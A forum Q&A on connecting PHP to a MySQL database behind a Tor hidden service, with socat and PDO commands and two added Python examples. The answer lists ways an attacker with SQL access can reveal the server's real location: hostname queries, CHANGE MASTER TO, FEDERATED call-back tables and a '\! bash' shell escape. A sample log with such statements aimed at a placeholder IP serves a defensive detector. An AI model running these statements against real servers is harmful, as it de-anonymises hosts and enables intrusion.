A theoretical question about connecting to hidden services through PHP.

Say I am writing an application on the clearnet that relies on data stored within a MySQL database that is hosted on a Tor hidden service. How would I initiate this connection?

Some brief research has pointed me towards the documentation on opening sockets (http://php.net/manual/en/book.sockets.php); however, I haven't come across this area before, so I am quite unsure where to get started.

Anyone have any ideas?

Is there a specific reason for this setup? Some points to consider:

  1. MySQL does not support SOCKS connections; you can create a Unix socket file, but it's not the same thing
  2. you will have to set up Tor nodes on both ends: application server and database server
  3. you will have to set up a hidden service in order to generate the private & public keys on the database server
  4. share the public key in the application server and connect through a Tor client or proxy
  5. latency issues
  6. the database will still be exposed to attacks, and if an attacker can access the application server or run SQL injections, then they can track back the database server location
  7. does your hosting allow such setups?

It would be a lot easier to set up an SSH tunnel, or to use Tor to serve an HTTP database interface and then use curl to perform CRUD operations, but this will avoid only point one of the above list; the other points will still be valid.

Some good points. Perhaps I'm more unfamiliar with Tor protocols than I thought, but I don't understand some of the things you mentioned.

2 & 3. Yes, but isn't this all an obvious given since the database server is hosted on a hidden service? The server will need a Tor node to accept incoming connections, and the client will need a node to contact the server. Likewise, setting up a hidden service will create the private & public keys, so I'm unsure why you mentioned it?

Four. My understanding was that the Tor network handled this automatically through Introduction points. https://www.torproject.org/docs/hidden-services.html.en

Six. How will the database or application server be any more vulnerable to injection attacks on Tor vs. clearnet? Also, I'm not sure someone could track a connection back to the server, because of the relays forming the connection. As we know, tracing the location of hidden services requires a consistent and dedicated attack. At most, the application server would just reveal the .onion address and the location of the first relay in the network. In order to attempt to find the destination, an attacker would need to own at least one relay in the network at any given time. Unless you are meaning that a SQL injection attack could somehow compromise the SQL server into releasing its real IP? I'm unfamiliar with injections generally, so I'm unsure if this is possible / how it would work.

Latency is obviously the biggest downside here. And I think if someone were to do this, then your idea of hosting a web service is the most logical solution; however, I fail to see the security vulnerabilities you mentioned, so some reiteration of those points would be appreciated.

2 & 3 are obvious, yes; I was repeating them just to clarify point 7: not all hosting providers will allow Tor nodes in their networks, so it could be difficult to perform the necessary steps to build such a config.

Point 4: when you start the database connection with something like new mysqli() or new PDO() and add the onion link (e.g. mysql:host=0123456789abcdef.onion), the system will call the glibc function getaddrinfo() to resolve the name with a DNS query and then the connect() function, at least on Linux. The onion link is not resolvable with a DNS call, and MySQL will not try to inject the request into the Tor node, so the connection will fail.

You could use the PHP socket extension, but then you cannot use the MySQL APIs and you will have to submit the queries in raw mode and then parse the results, which is like a telnet session, or like running queries from the command line:

mysql -s -r -D DBNAME -e 'SELECT * FROM `table_name`;'

The alternative is to force the API connection through SOCKS, but the MySQL (API) client does not support it directly, so you will need something like socat to create the local entry point; some examples here:

This, for example, works fine for me:

# fork: keep the listener alive after the first client disconnects; reuseaddr: allow a quick restart
socat TCP-LISTEN:3308,fork,reuseaddr SOCKS4A:localhost:0123456789abcdef.onion:3306,socksport=9050

Then you can connect to the database through the local tunnel opened on port 3308:

// host=127.0.0.1 rather than localhost: with "localhost" the MySQL client may use the Unix socket and bypass the socat listener
$conn = new PDO("mysql:host=127.0.0.1;port=3308;dbname=DATABASE", "USER", "PASS");

Unless you are meaning that a SQL injection attack could somehow compromise the SQL server into releasing its real IP?

About point 6: exactly. I wasn't saying it will become more vulnerable vs. clearnet, and I want to make clear that I'm not trying to discourage you from testing this approach. I was just remarking that obfuscating the location does not by itself increase the security of the server: if an attacker can run arbitrary queries, then he can try to run some commands to find the current location of the server, if needed:

  • by requesting the hostname;
  • by starting a connection as slave to a master database which will record the slave IP;
  • or by creating a federated table;

just to mention a few queries that can be run through the MySQL API when the user has all privileges. Then, if the hypothetical attacker can start a connection through a command-line client, he can use the system command to start a system shell: \! bash.

In practice, keep in mind that an attacker doesn't need to compromise the Tor network to find the hidden resource's position: once he can execute commands on that endpoint, he can follow other directions.
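To make point 4 concrete: the reason a plain MySQL client cannot reach a .onion host is that it resolves the name itself, while a SOCKS4A forwarder such as socat hands the *name* to the Tor SOCKS port and lets Tor resolve it. The following is an added example (not code from the original post or from socat) that implements that SOCKS4A CONNECT exchange on both sides, with the Tor side simulated over a socketpair so it runs offline. The onion address, the port numbers and the rule that the simulated proxy only grants .onion destinations are assumptions for the demo.

```python
"""SOCKS4A CONNECT handshake for a .onion destination, client and (simulated) proxy side.

Added example, not from the original post. The proxy is a stand-in for Tor's
SOCKS port: it only answers the handshake and does not build a circuit. The
onion address used below is a placeholder, not a real service.
"""
import socket
import struct
import threading

SOCKS_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 0x5A   # 90: request granted
REPLY_REJECTED = 0x5B  # 91: request rejected or failed


def build_socks4a_connect(host: str, port: int, userid: bytes = b"") -> bytes:
    """Build a SOCKS4A CONNECT request.

    SOCKS4 carries a 4-byte destination IP, so the client would have to call
    getaddrinfo() on the .onion name first (which fails, and leaks the name to
    DNS). SOCKS4A sets the IP to 0.0.0.x (x != 0) and appends the hostname
    after the NUL-terminated user id, so the proxy resolves it instead.
    """
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    head = struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, b"\x00\x00\x00\x01")
    return head + userid + b"\x00" + host.encode("ascii") + b"\x00"


def parse_socks4a_request(data: bytes):
    """Proxy side: return (port, destination) from a SOCKS4/4A CONNECT request."""
    vn, cd, port, ip = struct.unpack("!BBH4s", data[:8])
    if vn != SOCKS_VERSION or cd != CMD_CONNECT:
        raise ValueError("not a SOCKS4 CONNECT request")
    _userid, _, rest = data[8:].partition(b"\x00")
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:      # SOCKS4A marker: hostname follows
        host, _, _ = rest.partition(b"\x00")
        return port, host.decode("ascii")
    return port, socket.inet_ntoa(ip)                  # plain SOCKS4: literal IP


def build_socks4_reply(granted: bool) -> bytes:
    # Reply: VN is 0, CD is 90/91, the port and IP fields are ignored by clients.
    code = REPLY_GRANTED if granted else REPLY_REJECTED
    return struct.pack("!BBH4s", 0, code, 0, b"\x00" * 4)


def socks4a_connect(sock, host: str, port: int) -> None:
    """Client side: perform the handshake over an already open socket to the
    SOCKS server; afterwards the socket carries the MySQL stream unchanged."""
    sock.sendall(build_socks4a_connect(host, port))
    reply = b""
    while len(reply) < 8:                               # reply is exactly 8 bytes
        chunk = sock.recv(8 - len(reply))
        if not chunk:
            raise ConnectionError("proxy closed the connection during the handshake")
        reply += chunk
    if reply[0] != 0 or reply[1] != REPLY_GRANTED:
        raise ConnectionError(f"SOCKS4A CONNECT refused, code {reply[1]}")


def fake_tor_socks(sock, allowed_suffix: str = ".onion"):
    """Simulated Tor SOCKS port (assumption for the demo): grants CONNECT only
    for .onion names and reports what the client asked for."""
    port, host = parse_socks4a_request(sock.recv(4096))
    sock.sendall(build_socks4_reply(host.endswith(allowed_suffix)))
    return port, host


def demo(host: str = "0123456789abcdef.onion", port: int = 3306):
    """Run client and simulated proxy over a socketpair.
    Returns ((port, destination) as seen by the proxy, handshake succeeded?)."""
    client, proxy = socket.socketpair()
    seen = {}
    worker = threading.Thread(target=lambda: seen.setdefault("dst", fake_tor_socks(proxy)))
    worker.start()
    try:
        socks4a_connect(client, host, port)
        ok = True
    except ConnectionError:
        ok = False
    worker.join()
    client.close()
    proxy.close()
    return seen["dst"], ok


if __name__ == "__main__":
    print(demo())                     # proxy sees the .onion name, connect granted
    print(demo("example.com", 80))    # not an onion address: refused by the fake proxy
```

The practical check this gives you: run the handshake against the real Tor SOCKS port (127.0.0.1:9050 by default) and the request bytes on the wire must contain the .onion name after the NUL, never a resolved address; if your client library produces a SOCKS4 request with an IP in it, the name was resolved locally and the connection cannot work.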
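The three location-disclosure vectors listed under point 6 (hostname lookup, pointing the server at an attacker-controlled master, and a FEDERATED table calling back out) all show up server-side as statements, so they can be flagged in MySQL's general query log. The following is an added example (not code from the original post) that parses general_log file lines and flags those statements; the log lines are constructed samples in the 5.7/8.0 file format, and the thread id, host names and IPs in them are placeholders.

```python
"""Flag statements in a MySQL general query log that can reveal a hidden
database server's real location.

Added example, not from the original post. SAMPLE_LOG is constructed test
data in the general_log file format: "<timestamp>\t<thread id> <command>\t<argument>".
"""
import re

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

# Loose, case-insensitive patterns: an attacker can vary case and whitespace.
RULES = [
    # "by requesting the hostname"
    ("hostname_probe", re.compile(r"@@(global\.)?hostname|SHOW\s+VARIABLES\s+LIKE\s+'hostname'", re.I)),
    # "by starting a connection as slave to a master database" (the master logs the slave's IP)
    ("replica_to_attacker", re.compile(r"CHANGE\s+(MASTER|REPLICATION\s+SOURCE)\s+TO|START\s+(SLAVE|REPLICA)\b", re.I)),
    # "by creating a federated table" (the server connects out to the CONNECTION target)
    ("federated_callback", re.compile(r"ENGINE\s*=\s*FEDERATED|CONNECTION\s*=\s*'mysql://", re.I)),
]


def parse_line(line: str):
    """Split one general_log line into its fields, or None if it is not a log record."""
    m = LOG_LINE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def classify(statement: str):
    """Names of all rules the statement matches (empty list for benign SQL)."""
    return [name for name, pattern in RULES if pattern.search(statement)]


def scan(lines):
    """Return (thread_id, matched_rules, statement) for every Query record that hits a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["cmd"] != "Query":        # Connect/Quit/Init DB lines carry no SQL
            continue
        names = classify(rec["arg"])
        if names:
            hits.append((int(rec["thread"]), names, rec["arg"]))
    return hits


# Constructed sample: one session that probes, then tries both call-back vectors.
SAMPLE_LOG = """\
2019-03-01T10:00:01.000000Z\t   12 Connect\tapp@10.0.0.5 on shop using TCP/IP
2019-03-01T10:00:01.100000Z\t   12 Query\tSELECT id, name FROM products WHERE id = 42
2019-03-01T10:00:02.000000Z\t   12 Query\tSELECT @@hostname, @@version_compile_os
2019-03-01T10:00:03.000000Z\t   12 Query\tCHANGE MASTER TO MASTER_HOST='203.0.113.9', MASTER_USER='r', MASTER_PASSWORD='x'
2019-03-01T10:00:03.500000Z\t   12 Query\tSTART SLAVE
2019-03-01T10:00:04.000000Z\t   12 Query\tCREATE TABLE probe (id INT) ENGINE=FEDERATED CONNECTION='mysql://r:x@203.0.113.9:3306/d/t'
2019-03-01T10:00:05.000000Z\t   12 Quit\t
"""

if __name__ == "__main__":
    for thread, names, stmt in scan(SAMPLE_LOG.splitlines()):
        print(f"thread {thread}: {', '.join(names)}: {stmt}")
```

Two caveats a practitioner should keep in mind: the \! shell escape mentioned above is executed by the command-line client and never reaches the server, so no server-side log catches it; and logging is a detective control only. The preventive fix is the one implied by the answer, which is not to hand the application user SUPER/REPLICATION privileges or FEDERATED in the first place, so the statements fail rather than merely get logged.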